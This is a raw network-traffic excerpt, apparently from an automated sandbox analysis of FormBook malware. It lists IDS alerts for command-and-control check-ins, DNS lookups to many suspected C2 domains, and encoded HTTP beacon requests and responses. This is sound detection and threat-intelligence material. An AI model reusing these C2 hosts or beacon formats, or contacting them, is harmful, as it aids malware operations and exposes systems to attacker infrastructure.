            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49723 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49745 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49753 -> 47.239.13.172:80
            Source: DNS query: www.grafiktema.xyz
            Source: Joe Sandbox ViewIP Address: 91.184.0.111
            Source: Joe Sandbox ViewIP Address: 198.12.241.35
            Source: Joe Sandbox ViewIP Address: 192.250.231.28
            Source: Joe Sandbox ViewASN Name: HOSTNETNL
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewASN Name: CNSV-LLCUS
            Source: Joe Sandbox ViewASN Name: GANDI-ASDomainnameregistrar-httpwwwgandinetFR
            Source: Joe Sandbox ViewASN Name: SVK-ASCZ
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.goodgiftguru.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /oxoz/?bFGXGTdX=2tfclvLQdcOBJmGnIZVAP5JMnkUnnIVvl5+7iv031/ylbgKII8HkCnHT6NNgDVU8buPmA9RxJ1d+vIxyZHsoGN30KfBqGUlKbJLPWs8oJbYVBexVLA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.fardvuss.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.vacaturecast.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.drivemktg.coConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bqpw/?bFGXGTdX=7i7mgMVoUdn3K3H4hxR2Z2sx7NMDmz1WBuojPjrSQrb0L6/7xSQOb69NgDz1ThGB8kqobNNV7CaIX5kMC3tpqGoJwELsf5+TzHoCpSOUthnHuH68iQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.nbh6agr8h.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qii2/?bFGXGTdX=MyAnEvAqgx9IHgh7O1f7tHhASGGjAfpU9Y1SDE6GUOU+/QpZ0wdWe4W7KVnq9zWaa6WrnYnil8yz0OBRRbaeb4KuJn8nSoXQG6ZxMFNQIXEXLDmqOQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.54bxd.cyouConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zqqa/?bFGXGTdX=ZXXpLVL5zGXuIyziXd74rR8Z9u95/Dmogjom9+EAQEp6mmLdAUlPVhz6U9vRTuA6wBlP9h+HTHItH2gyziEy2Gmm5hf6oNdAA8n0WZPfrmRJWLBYJQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.r7xzr3ib0.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zwgt/?bFGXGTdX=dCUrqoNNqYa01jj8ucmLyHx7kNIUn0PrfHpa8tjXz+CKp9k6oQP/Fdto1b0bQ/emz29BsG965J3wVz+jeRQuKqDu3O+8XeswSZaKGjOqnVkBxijyaA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.bitmapsportsbook.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK+r72OxgWH8wd7wLlO4AB5vUmoL6nk1FBVggKsZuxPhO/hPMpvJNZBalqpQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.aceautocorp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.purpleheartlacey.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pt32/?bFGXGTdX=y3myQPKMG7UG4U86kYjDSgzezXSmAkUzi6cKVm8KTXszLa2xdxq+NpYfRMeTkluAfKxM8yJJ9pAbryr3svtYXqMrD5rBnUtNlc/QUHCATHSaLBoyFg==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.grafiktema.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /o1v8/?bFGXGTdX=1i6yDzrkvfTg1xRY+mVcmT0mAxqtzWYSPwzr6OqMIexmyiVm05r+M/L0QtcaHGif89shAFkQDwq9CioCdeM2s5RrcMFZtF0WLInyLOarA44qlhj6rw==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.cr-pos.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d8su/?bFGXGTdX=3HBCjYMba2FPA3TIMZ366tJLR19IJjxz0bIsDTYva69fDAgKwrpmDBuz3X8ZHGWOiFUXNC9bte/eip1p2XCq457JVfW7M++UWZyl/bQwgvBliJsYpA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.trcrb8e8m.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.make-l.ru
            Source: global trafficDNS traffic detected: DNS query: www.goodgiftguru.com
            Source: global trafficDNS traffic detected: DNS query: www.fardvuss.top
            Source: global trafficDNS traffic detected: DNS query: www.vacaturecast.com
            Source: global trafficDNS traffic detected: DNS query: www.drivemktg.co
            Source: global trafficDNS traffic detected: DNS query: www.nbh6agr8h.sbs
            Source: global trafficDNS traffic detected: DNS query: www.54bxd.cyou
            Source: global trafficDNS traffic detected: DNS query: www.r7xzr3ib0.sbs
            Source: global trafficDNS traffic detected: DNS query: www.bitmapsportsbook.com
            Source: global trafficDNS traffic detected: DNS query: www.aceautocorp.com
            Source: global trafficDNS traffic detected: DNS query: www.purpleheartlacey.com
            Source: global trafficDNS traffic detected: DNS query: www.cityrentsatruck.com
            Source: global trafficDNS traffic detected: DNS query: www.grafiktema.xyz
            Source: global trafficDNS traffic detected: DNS query: www.cr-pos.com
            Source: global trafficDNS traffic detected: DNS query: www.trcrb8e8m.sbs
            Source: global trafficDNS traffic detected: DNS query: www.sulpapeis.online
            Source: unknownHTTP traffic detected: POST /oxoz/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.fardvuss.topOrigin: http://www.fardvuss.topContent-Length: 197Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Referer: http://www.fardvuss.top/oxoz/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:03:05 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:03:08 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:03:10 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:03:13 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:05:05 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10066Content-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:05:07 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10066Content-Type: text/html; charset=UTF-8Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 72 e9 9a b3 0c 1d 29 64 ce 0b 82 ef 94 6a cd d1 5c c8 d1 5a 3c fe b9 ad 83 f0 45 61 db b5 23 44 8a 8f 41 91 38 41 cd f0 66 29 70 8f ef e5 3c aa 83 f9 5b 3f 28 ef f5 b0 73 50 c3 14 48 e8 f8 17 db d7 0b 47 74 e5 d3 fa 69 ed e8 79 e2 4e ed 69 02 4c f6 b4 ce a4 8d a7 35 82 e7 f1 b4 e6 09 65 34 7a 5a 67 e2 92 89 a7 75 80 03 75 f1 41 19 e4 8e 6b 40 80 03 77 da e1 1c 75 a7 dd cb 0e 77 da 7d fb fe 46 77 7a bf 39 da 46 1d 61 0a 1a 33 34 d2 7b 15 61 e0 13 c7 8e ad cb c4 79 24 f9 f5 15 8d bf 9d 23 fa 4c 49 c6 4f 69 45 f5 c8 27 65 eb 
94 a6 54 04 f3 5c 2d d7 b7 57 a7 58 c0 a9 43 2d d0 0e 30 a7 a4 44 df 5f b5 70 bb 5e 5e cd d5 d9 11 6a 3c 14 4c fb 18 ec b0 aa f6 bd 0f 9a 50 8d 7a fb ba 7f dc d7 53 36 3e c6 67 e5 bc 2b 15 2e f4 eb 65 d1 2a ee 28 e0 f3 3f aa df ba 10 cd 95 53 ce 69 33 3c 78 63 e5 4e 51 a7 fc bd 57 87 d0 e0 e2 36 a1 45 e4 de ba 7b 0d 3d 42 9a cb 67 14 9a e6 99 84 8d 63 86 3d 79 0d 45 8b 9a 27 f1 a7 6a 7c c8 30 c3 8a 36 72 38 49 47 73 b8 72 12 27 b9 7a 12 08 2b da e9 be ff ac 2e 3e f4 98 61 56 97 64 be a6 f4 81 bf e8 c1 47 e2 a3 b5 f2 35 54 74 a7 7c 71 79 96 3f 49 2f d1 c7 74 1e de 25 85 b0 ad 43 ba 5e 39 f4 05 a6 48 d5 0a 0d 4f 8b 7f 73 12 cf 84 c2 be 96 fa b5 80 aa eb da 3e fa e7 19 31 f9 35 47 2a b6 0f 1f 7a 34 35 d2 a9 a0 42 19 0e 4a cf 80 ea c5 06 4f c7 36 8f 9a a7 63 db 75 d1 d3 b1 53 ac 7b 3a 0a c6 da a7 a3 48 65 e6 5a 2d 00 fd ea db cb 81 de 5f f1 f2 0a f5 da b6 93 7f 2f 19 05 bb 09 91 0e 74 7c e8 e6 e6 fa f6 Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:05:07 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10066Content-Type: text/html; charset=UTF-8Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 72 e9 9a b3 0c 1d 29 64 ce 0b 82 ef 94 6a cd d1 5c c8 d1 5a 3c fe b9 ad 83 f0 45 61 db b5 23 44 8a 8f 41 91 38 41 cd f0 66 29 70 8f ef e5 3c aa 83 f9 5b 3f 28 ef f5 b0 73 50 c3 14 48 e8 f8 17 db d7 0b 47 74 e5 d3 fa 69 ed e8 79 e2 4e ed 69 02 4c f6 b4 ce a4 8d a7 35 82 e7 f1 b4 e6 09 65 34 7a 5a 67 e2 92 89 a7 75 80 03 75 f1 41 19 e4 8e 6b 40 80 03 77 da e1 1c 75 a7 dd cb 0e 77 da 7d fb fe 46 77 7a bf 39 da 46 1d 61 0a 1a 33 34 d2 7b 15 61 e0 13 c7 8e ad cb c4 79 24 f9 f5 15 8d bf 9d 23 fa 4c 49 c6 4f 69 45 f5 c8 27 65 eb 
94 a6 54 04 f3 5c 2d d7 b7 57 a7 58 c0 a9 43 2d d0 0e 30 a7 a4 44 df 5f b5 70 bb 5e 5e cd d5 d9 11 6a 3c 14 4c fb 18 ec b0 aa f6 bd 0f 9a 50 8d 7a fb ba 7f dc d7 53 36 3e c6 67 e5 bc 2b 15 2e f4 eb 65 d1 2a ee 28 e0 f3 3f aa df ba 10 cd 95 53 ce 69 33 3c 78 63 e5 4e 51 a7 fc bd 57 87 d0 e0 e2 36 a1 45 e4 de ba 7b 0d 3d 42 9a cb 67 14 9a e6 99 84 8d 63 86 3d 79 0d 45 8b 9a 27 f1 a7 6a 7c c8 30 c3 8a 36 72 38 49 47 73 b8 72 12 27 b9 7a 12 08 2b da e9 be ff ac 2e 3e f4 98 61 56 97 64 be a6 f4 81 bf e8 c1 47 e2 a3 b5 f2 35 54 74 a7 7c 71 79 96 3f 49 2f d1 c7 74 1e de 25 85 b0 ad 43 ba 5e 39 f4 05 a6 48 d5 0a 0d 4f 8b 7f 73 12 cf 84 c2 be 96 fa b5 80 aa eb da 3e fa e7 19 31 f9 35 47 2a b6 0f 1f 7a 34 35 d2 a9 a0 42 19 0e 4a cf 80 ea c5 06 4f c7 36 8f 9a a7 63 db 75 d1 d3 b1 53 ac 7b 3a 0a c6 da a7 a3 48 65 e6 5a 2d 00 fd ea db cb 81 de 5f f1 f2 0a f5 da b6 93 7f 2f 19 05 bb 09 91 0e 74 7c e8 e6 e6 fa f6 Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:05:10 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 10066Content-Type: text/html; charset=UTF-8Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 72 e9 9a b3 0c 1d 29 64 ce 0b 82 ef 94 6a cd d1 5c c8 d1 5a 3c fe b9 ad 83 f0 45 61 db b5 23 44 8a 8f 41 91 38 41 cd f0 66 29 70 8f ef e5 3c aa 83 f9 5b 3f 28 ef f5 b0 73 50 c3 14 48 e8 f8 17 db d7 0b 47 74 e5 d3 fa 69 ed e8 79 e2 4e ed 69 02 4c f6 b4 ce a4 8d a7 35 82 e7 f1 b4 e6 09 65 34 7a 5a 67 e2 92 89 a7 75 80 03 75 f1 41 19 e4 8e 6b 40 80 03 77 da e1 1c 75 a7 dd cb 0e 77 da 7d fb fe 46 77 7a bf 39 da 46 1d 61 0a 1a 33 34 d2 7b 15 61 e0 13 c7 8e ad cb c4 79 24 f9 f5 15 8d bf 9d 23 fa 4c 49 c6 4f 69 45 f5 c8 27 65 eb 
94 a6 54 04 f3 5c 2d d7 b7 57 a7 58 c0 a9 43 2d d0 0e 30 a7 a4 44 df 5f b5 70 bb 5e 5e cd d5 d9 11 6a 3c 14 4c fb 18 ec b0 aa f6 bd 0f 9a 50 8d 7a fb ba 7f dc d7 53 36 3e c6 67 e5 bc 2b 15 2e f4 eb 65 d1 2a ee 28 e0 f3 3f aa df ba 10 cd 95 53 ce 69 33 3c 78 63 e5 4e 51 a7 fc bd 57 87 d0 e0 e2 36 a1 45 e4 de ba 7b 0d 3d 42 9a cb 67 14 9a e6 99 84 8d 63 86 3d 79 0d 45 8b 9a 27 f1 a7 6a 7c c8 30 c3 8a 36 72 38 49 47 73 b8 72 12 27 b9 7a 12 08 2b da e9 be ff ac 2e 3e f4 98 61 56 97 64 be a6 f4 81 bf e8 c1 47 e2 a3 b5 f2 35 54 74 a7 7c 71 79 96 3f 49 2f d1 c7 74 1e de 25 85 b0 ad 43 ba 5e 39 f4 05 a6 48 d5 0a 0d 4f 8b 7f 73 12 cf 84 c2 be 96 fa b5 80 aa eb da 3e fa e7 19 31 f9 35 47 2a b6 0f 1f 7a 34 35 d2 a9 a0 42 19 0e 4a cf 80 ea c5 06 4f c7 36 8f 9a a7 63 db 75 d1 d3 b1 53 ac 7b 3a 0a c6 da a7 a3 48 65 e6 5a 2d 00 fd ea db cb 81 de 5f f1 f2 0a f5 da b6 93 7f 2f 19 05 bb 09 91 0e 74 7c e8 e6 e6 fa f6 Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Wed, 11 Sep 2024 20:06:15 GMT Connection: close Content-Length: 1245
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Wed, 11 Sep 2024 20:06:18 GMT Connection: close Content-Length: 1245
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Wed, 11 Sep 2024 20:06:20 GMT Connection: close Content-Length: 1245
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Wed, 11 Sep 2024 20:06:23 GMT Connection: close Content-Length: 1245
            Source: SecEdit.exe, 0000000C.00000002.3793502568.00000000047D6000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000004176000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK
            Source: SecEdit.exe, 0000000C.00000002.3793502568.0000000003FFC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.000000000399C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.000000000380A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/
            Source: Amcache.hve.8.dr String found in binary or memory: http://upx.sf.net
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3795206841.0000000005411000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.cr-pos.com
